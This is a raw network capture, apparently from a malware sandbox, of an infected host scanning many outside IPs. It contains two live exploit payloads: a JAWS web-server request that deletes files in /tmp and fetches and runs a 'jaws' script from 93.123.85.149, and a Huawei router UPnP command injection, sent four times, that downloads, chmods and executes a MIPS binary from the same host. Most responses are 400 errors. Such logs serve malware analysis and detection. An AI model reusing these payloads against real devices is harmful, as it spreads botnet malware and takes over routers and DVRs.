                                                            Jan 26, 2024 15:32:47.933136940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.171112061 CET285INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 128
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            583192.168.2.2349318153.121.71.21680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.060193062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.350446939 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            584192.168.2.23576262.23.231.4880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.222059011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.604387999 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 64 37 65 39 34 35 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 38 26 23 34 36 3b 33 34 32 61 62 33 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;6d7e9452&#46;1706279568&#46;342ab3d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            585192.168.2.235695020.88.0.21180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.719028950 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.838912964 CET459INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            586192.168.2.2336810162.215.114.25380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.749851942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.910693884 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            587192.168.2.2353778159.69.144.11080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.799772978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:49.005259037 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            588192.168.2.2347522156.241.94.10637215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:48.825042963 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:50.556323051 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:52.604008913 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:56.795428038 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            589192.168.2.235202638.14.3.12180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:49.343724012 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:49.840627909 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            590192.168.2.234100666.228.56.19680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:49.930063009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.034598112 CET450INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:49 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.31
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
